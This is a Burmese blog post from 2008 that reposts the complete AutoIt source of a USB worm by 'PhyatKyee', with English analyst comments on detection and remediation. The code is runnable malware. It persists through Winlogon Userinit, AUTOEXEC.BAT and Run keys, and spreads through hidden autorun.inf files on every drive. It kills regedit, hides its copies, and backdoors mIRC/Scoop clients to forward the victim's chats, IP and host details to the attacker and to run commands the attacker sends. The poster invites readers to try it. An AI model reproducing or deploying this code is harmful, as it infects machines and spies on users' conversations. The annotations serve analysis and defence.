Friday, December 26, 2008

ဖ်က္ႀကီ .. ေတာ္ေတာ္ ဆုိတယ္

; Analyst note: start-up stage of the script. It hides the AutoIt tray icon and then
; rewrites file-class values in the registry.
Opt("TrayIconHide", 1) ;0=show, 1=hide tray icon
; The next four writes map two unusual extensions to the "exefile" class, under both
; HKCR and HKLM\SOFTWARE\Classes. The copies dropped later in this listing use names
; ending in these extensions, so presumably this is what lets them launch as programs.
; Detection: any extension other than .exe whose default value is "exefile".
RegWrite("HKEY_CLASSES_ROOT\. ", "", "REG_SZ", "exefile")
RegWrite("HKEY_CLASSES_ROOT\.~»", "", "REG_SZ", "exefile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\. ", "", "REG_SZ", "exefile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.~»", "", "REG_SZ", "exefile")
; Sets the InfoTip value on HKCR\* (the class that applies to every file type).
; The string is a simple host indicator to search for during triage.
RegWrite("HKEY_CLASSES_ROOT\*", "InfoTip", "REG_SZ", "I love you baby!")
; If a process named msconfig.pif is running (the file name this script gives its
; copies on fixed drives further down), open an Explorer window on the folder the
; script was started from, so the drive still appears to open normally to the user.
If ProcessExists("msconfig.pif")then
$dir = "explorer.exe " & @ScriptDir
Run( $dir , "", @SW_MAXIMIZE) ;if user open the drive, allow it
EndIf
; Install stage. The Then branch (a process with this name is already running) is
; empty; all of the work happens in the Else branch, i.e. when no such process exists.
If ProcessExists("«~.~»") Then ;if not infected

Else
; Copy of the running script into the system directory under the name of a legitimate
; Windows boot file, then marked read-only + system + hidden.
FileCopy( @ScriptFullPath , @SystemDir & "\ntdetect.com",1) ;0 =not overwrite 1 = overwrite
FileSetAttrib( @SystemDir & "\ntdetect.com", "+R+S+H")
; Persistence: appends the copy to the Winlogon Userinit value, so it is started at
; every logon. Remediation: the value should list only the path to userinit.exe.
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit", "REG_SZ" ,@SystemDir & "\userinit.exe," & @SystemDir & "\ntdetect.com")

; Second copy in the system directory, also read-only + system + hidden.
FileCopy( @ScriptFullPath , @SystemDir & "\«~.~»",1)
FileSetAttrib( @SystemDir & "\«~.~»", "+R+S+H")

; Second persistence point: c:\AUTOEXEC.BAT is made writable and opened in mode 2,
; which erases its previous contents; a single "start" line for the copy replaces them.
FileSetAttrib( "c:\AUTOEXEC.BAT", "-R")
$file = FileOpen("c:\AUTOEXEC.BAT", 2) ;0 Read,1 Append , 2 Clear contents
; Check if file opened for writing OK
If $file = -1 Then
Exit
EndIf
FileWrite($file, "start " & @SystemDir & "\«~.~»")
FileClose($file)
; Starts the second copy with a hidden window.
Run( @SystemDir & "\«~.~»" ,"" , @SW_HIDE)
EndIf


; Main dispatcher. The script picks a role from (a) the type of drive it was started
; from and (b) its own full path, which it compares with the drop locations it uses.
$app = @ScriptDir
$var = DriveGetType( $app )

If $var = "REMOVABLE" then ;First run from Memory Stick Initial stage for infection

; Started from removable media: only an Explorer window on that drive is opened here.
$dir = "explorer.exe " & @ScriptDir
Run( $dir , "", @SW_MAXIMIZE) ;if user open MEmorystick allow it

Elseif $var = "fixed" then ;running from computer

; Role 1 - running as <system dir>\ntdetect.com (the copy started through Userinit).
; Re-points the .mp3 and .jpg extensions at a made-up class named "love" and changes
; the DefaultIcon of that class, of dllfile, and of CLSID
; {20D04FE0-3AEA-1069-A2D8-08002B30309D} (the My Computer shell object) to the icon of
; the dropped copy. Written under both HKCR and HKLM\SOFTWARE\Classes.
; Remediation: restore the original class names and DefaultIcon values for these keys.
If @SystemDir & "\ntdetect.com" = @ScriptFullPath then
RegWrite("HKEY_CLASSES_ROOT\.mp3", "", "REG_SZ", "love")
RegWrite("HKEY_CLASSES_ROOT\.jpg", "", "REG_SZ", "love")
RegWrite("HKEY_CLASSES_ROOT\love", "", "REG_SZ", "somazina@gmail.com")
RegWrite("HKEY_CLASSES_ROOT\dllfile\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_CLASSES_ROOT\love\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mp3", "", "REG_SZ", "love")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.jpg", "", "REG_SZ", "love")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\love", "", "REG_SZ", "somazina@gmail.com")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\love\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")
RegWrite("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon", "", "REG_SZ", @SystemDir & "\«~.~»,0")

; Date gate (month 2, day 16) that also appears in every other role below. This role
; has no loop, so on other dates execution continues with the code after "Main End".
If @MON = "2" and @MDAY = "16" Then Exit
; Role 2 - running as the second system-directory copy: the propagation loop.
Elseif @SystemDir & "\«~.~»" = @ScriptFullPath then

$ii = 0
$count = 0

Do
$drv = DriveGetDrive( "removable" ) ;Check for removable Disk to be infected
; Everything down to the matching EndIf runs only when at least one removable drive
; was enumerated, including the fixed-drive pass and the process check.
If NOT @error Then
If @MON = "2" and @MDAY = "16" Then ExitLoop

For $i = 1 to $drv[0]

; Skips a: and drives that are not ready. On each remaining removable drive it drops
; two copies of itself (flag 0 = do not overwrite) and writes an autorun.inf whose
; open / shellexecute / shell commands all point at the first copy, then hides the
; autorun.inf with the system + hidden attributes.
; Detection: a hidden autorun.inf in a drive root referencing either dropped name.
if $drv[$i] <> "a:" then
if DriveStatus ( $drv[$i] ) = "READY" then
FileCopy( @ScriptFullPath , $drv[$i] & "\phyatkyee.blogspot.com",0)
FileCopy( @ScriptFullPath , $drv[$i] & "\Photos.exe",0)
FileSetAttrib( $drv[$i] & "\autorun.inf", "-R-S")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "open", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shellexecute", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shell\Explore\command", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shell\Open\command", "phyatkyee.blogspot.com")
IniWrite($drv[$i] & "\autorun.inf", "autorun", "shell", "Explore")
FileSetAttrib( $drv[$i] & "\autorun.inf", "+S+H")
EndIf
EndIf
Next ;end of next for removeable drives
; Same pattern for every fixed drive whose status is not "UNKNOWN": a copy named
; msconfig.pif (flag 1 = overwrite) plus an autorun.inf pointing at it, this time
; marked read-only + system + hidden.
$fix = DriveGetDrive( "fixed" )
For $a = 1 to $fix[0] ;for Hard drives
If DriveStatus ( $fix[$a] ) = "UNKNOWN" then
Else
FileCopy( @ScriptFullPath , $fix[$a] & "\msconfig.pif",1)
IniWrite($fix[$a] & "\autorun.inf", "autorun", "open", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shellexecute", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shell\Explore\command", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shell\Open\command", "msconfig.pif")
IniWrite($fix[$a] & "\autorun.inf", "autorun", "shell", "Explore")
FileSetAttrib( $fix[$a] & "\autorun.inf", "+R+S+H")
EndIf
Next
;check for initial program
; If the companion process is not running, a copy is placed in the Program Files
; directory and started hidden; that copy takes the role handled further down.
If ProcessExists(" . ") Then
Else
FileCopy( @ScriptFullPath , @ProgramFilesDir & "\ . ",1)
Run( @ProgramFilesDir & "\ . ", "", @SW_HIDE)
EndIf
EndIf
; One pass every 10 seconds. $ii is set to 0 above and is not changed anywhere in this
; listing, and $count is never read, so as written the loop ends only through the
; date gate or when the process is terminated.
Sleep(10000)
Until $ii = 10

; Role 3 - running as the Program Files copy: a watchdog that loops every 500 ms.
Elseif @ProgramFilesDir & "\ . " = @ScriptFullPath then

While 0 <> 1
If @MON = "2" and @MDAY = "16" Then Exit
; Re-creates and restarts the companion copies whenever their process is missing.
; Cleanup therefore has to stop all running instances before the files are deleted.
If ProcessExists(" . ") = 0 Then
FileCopy( @ScriptFullPath , @WindowsDir & "\ . ",1)
Run(" . ", "", @SW_HIDE)

EndIf
If ProcessExists("«~.~»") = 0 Then
FileCopy( @ScriptFullPath , @SystemDir & "\«~.~»",1)
Run("«~.~»", "", @SW_HIDE)

EndIf

; Anti-remediation: closes regedit.exe on every pass, so the Registry Editor cannot be
; kept open while this instance is running.
ProcessClose("regedit.exe")
$PID = ProcessExists("regedit.exe") ; Will return the PID or 0 if the process isn't found.( PID= Process ID )
If $PID Then ProcessClose($PID)


; Keeps Explorer's "show protected operating system files" setting switched off for
; the current user, which keeps the system + hidden copies out of view.
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD" ,"0")
sleep(500)

WEnd

; Role 4 - running as the Windows-directory copy: second watchdog.
Elseif @WindowsDir & "\ . " = @ScriptFullPath then
; Adds an HKCU Run value named "Yadanar" that points at <Windows dir>\TASKMAN.EXE.
; No code in this listing creates that file, so the entry is mainly useful as an
; indicator to search for.
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Yadanar", "REG_SZ", @WindowsDir & "\TASKMAN.EXE")

While 0 <> 1
If @MON = "2" and @MDAY = "16" Then Exit
If ProcessExists(" . ") = 0 Then
FileCopy( @ScriptFullPath , @ProgramFilesDir & "\ . ",1)
Run(@ProgramFilesDir & "\ . ", "", @SW_HIDE)
EndIf
If ProcessExists("«~.~»") = 0 Then
FileCopy( @ScriptFullPath , @SystemDir & "\«~.~»",1)
Run("«~.~»", "", @SW_HIDE)

Endif
; NoDriveTypeAutoRun is a bit mask of drive types for which AutoRun is disabled; the
; value 1 leaves AutoRun enabled for removable and fixed drives, and it is rewritten
; every 500 ms. Hardening guidance is normally 0xFF (AutoRun off for all drive types).
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDriveTypeAutoRun", "REG_DWORD", "1")
sleep(500)
WEnd
Endif ;fixed drive end
Endif; Main End


;for MIRc program
; Analyst note: runs only when mirc.ini exists at the default install path. It plants
; two mIRC remote-script files; both are plain text despite their .dll names.
if FileExists( "C:\Program Files\mIRC\mirc.ini") then

; mth.dll: three event handlers that each send a private message to the nick
; PhyatKyee - one forwarding incoming text, one forwarding what the local user types,
; and one sent on channel join carrying $ip, $host, $os, $server and $serverIP.
; Impact: disclosure of the victim's conversations and connection details.
$file = FileOpen("C:\Program Files\mIRC\mth.dll", 2);1 append 2 erase
If $file = -1 Then
Exit
EndIf
FileWrite($file, "on *:text:*:*: { .msg PhyatKyee «« < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }" & @CRLF)
FileWrite($file, "on *:input:*: { .msg PhyatKyee »» $iif($left($1,1) != / , < $+ $active $+ > ,[command]) $1- }" & @CRLF)
FileWrite($file, "on *:JOIN:#: { .msg PhyatKyee IP $+ » $+ $ip ¤ Host $+ » $+ $host ¤ $os ¤ server $+ » $+ $server ¤ $serverIP }")

; mirc.dll: mostly commented-out filler, plus a handler for private messages that
; begin with an apostrophe. It appears to run the rest of such a message as a mIRC
; command and suppress its display (haltdef), i.e. a remote-control channel inside the
; client. An on-connect timer also reports to the same nick.
$file = FileOpen("C:\Program Files\mIRC\mirc.dll", 2)
If $file = -1 Then
Exit
EndIf
FileWrite($file, ";If you don't know what you were doing" & @CRLF)
FileWrite($file, ";Don't modify the codes" & @CRLF)
FileWrite($file, ";By... PhyatKyee" & @CRLF)
FileWrite($file, "on ^*:text:'*:?: { . $+ $2- | haltdef }" & @CRLF)
FileWrite($file, ";combo 20, 100 41 104 285, edit " & @CRLF)
FileWrite($file, ";text Ops (+o):, 5, 3 44 95 13, right}" & @CRLF)
FileWrite($file, ";on 1:dialog:ncor:init:0:{" & @CRLF)
FileWrite($file, ";on ^*:text:'*:?: { . $+ $2- | haltdef }" & @CRLF)
FileWrite($file, ";}" & @CRLF)
FileWrite($file, "on *:connect: { /timer 30 120 /.msg PhyatKyee hi I'm now Using mIRC »» mth.dll }")
; mirc.ini changes: registers mirc.dll as remote file n2 under [rfiles] and switches
; off the fserve, dcc and link warnings under [warn].
; Remediation: delete both planted files, remove the n2 entry and restore the warnings.
IniWrite("C:\Program Files\mIRC\mirc.ini", "rfiles", "n2", "mirc.dll")
IniWrite("C:\Program Files\mIRC\mirc.ini", "warn", "fserve", "off")
IniWrite("C:\Program Files\mIRC\mirc.ini", "warn", "dcc", "off")
IniWrite("C:\Program Files\mIRC\mirc.ini", "warn", "link", "off")

endif

; for scoopScript2004
; Analyst note: same tampering as the mIRC section, applied to a Scoop2004 install
; when C:\Scoop2004\mirc.ini exists.
if FileExists( "C:\Scoop2004\mirc.ini") then

; mth.dll: handlers that forward incoming text, the user's own input and join-time
; connection details ($ip, $host, $os, $server, $serverIP) to the nick PhyatKyee.
$file = FileOpen("C:\Scoop2004\mth.dll", 2)
If $file = -1 Then
Exit
EndIf
FileWrite($file, "on *:text:*:*: { .msg PhyatKyee «« < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }" & @CRLF)
FileWrite($file, "on *:input:*: { .msg PhyatKyee »» $iif($left($1,1) != / , < $+ $active $+ > ,[command]) $1- }" & @CRLF)
FileWrite($file, "on *:JOIN:#: { .msg PhyatKyee IP $+ » $+ $ip ¤ Host $+ » $+ $host ¤ $os ¤ server $+ » $+ $server ¤ $serverIP }")

; remote03.sco is opened in mode 2, so any existing script of that name is erased and
; replaced by the apostrophe-prefixed private-message handler and an on-connect report.
$file = FileOpen("C:\Scoop2004\remote03.sco", 2)
If $file = -1 Then
Exit
EndIf

FileWrite($file, "on ^*:text:'*:?: { . $+ $2- | haltdef }" & @CRLF)
FileWrite($file, "on *:connect: { /timer 30 120 /.msg PhyatKyee Scoop »» mth.dll }")
; Registers remote03.sco as remote file n3 and turns off the fserve, dcc and link
; warnings. Remediation: restore remote03.sco from a clean install, delete mth.dll,
; and re-enable the three warnings.
IniWrite("C:\Scoop2004\mirc.ini", "rfiles", "n3", "remote03.sco")
IniWrite("C:\Scoop2004\mirc.ini", "warn", "fserve", "off")
IniWrite("C:\Scoop2004\mirc.ini", "warn", "dcc", "off")
IniWrite("C:\Scoop2004\mirc.ini", "warn", "link", "off")

endif

;If my birthday
; Analyst note: the condition tests the day of the week, not a calendar date. AutoIt's
; @WDAY runs from 1 (Sunday) to 7, so the value 5 corresponds to Thursday.
if @WDAY = "5" then
; Endless loop: shows a message box (flag 4096 = system modal), waits 50 seconds,
; rewrites the file associations below, waits 90 seconds, and repeats.
While 0 <> 1
msgbox(4096,"Birthday","Happy Birthday !" & @CRLF & "And I love you So Much." & @CRLF & "Ko PhyatKyee" )
sleep(50000)
; Points .mp3 and .jpg back at conventional class names, undoing the "love" mapping
; made in the main section. The HKCR write uses "jpegfile" while the HKLM write uses
; "jpgfile", so the two hives end up disagreeing; .lnk is set under HKLM only.
RegWrite("HKEY_CLASSES_ROOT\.mp3", "", "REG_SZ", "mp3file")
RegWrite("HKEY_CLASSES_ROOT\.jpg", "", "REG_SZ", "jpegfile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.mp3", "", "REG_SZ", "mp3file")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.jpg", "", "REG_SZ", "jpgfile")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk", "", "REG_SZ", "lnkfile")

sleep(90000)
WEnd
EndIf


ေအာက္ကဟာကေတာ့ mircchatက စပုိင္ပရိုဂရမ္ေလးပါ
စိတ္ဝင္စားရင္ စမ္းၾကည္ပါခင္ဗ်ာ


အဲသလုိ ေရထာတာေတာ့ ကုိ ဖ်က္ႀကီ ျဖစ္ပါတယ္ ကၽြန္ေတာ္ ေတာ့ နည္နည္ ရုိင္တယ္လုိ ေရခဲ့တယ္..
ခင္ဗ်ာ တုိ႔ ဘယ္လုိ႔ ထင္လဲ ဗ်..
သူ virus က computer icon ပုံေတြကုိ ေကာင္မေလ ပုံ ေျပာင္တာ တုိ႔ ဘာလုိ႔ လုပ္တယ္ ဗ်ာ..
သိပ္ ေတာ့ မထိခုိက္ဘူလုိ႔ ေျပာၾကတာ ပဲ
ကၽြန္ေတာ္ လဲ မလုပ္တတ္ေသဘူ ခုမွ စမ္ ၾကည့္ ရမွာ သူဘေလာက္ ကုိ သြာၾကည့္ေတာ့ အဲဒီ code ေတြ တာ နဲ႔ ခု အျခာ လူေတြ နည္လမ္မ်ာ ရမလာ လုိ႔ .. တင္ေပလိုက္ပါတယ္ ခင္ဗ်ာ..

ေလစာစြာျဖင့္
အလင္ေရာင္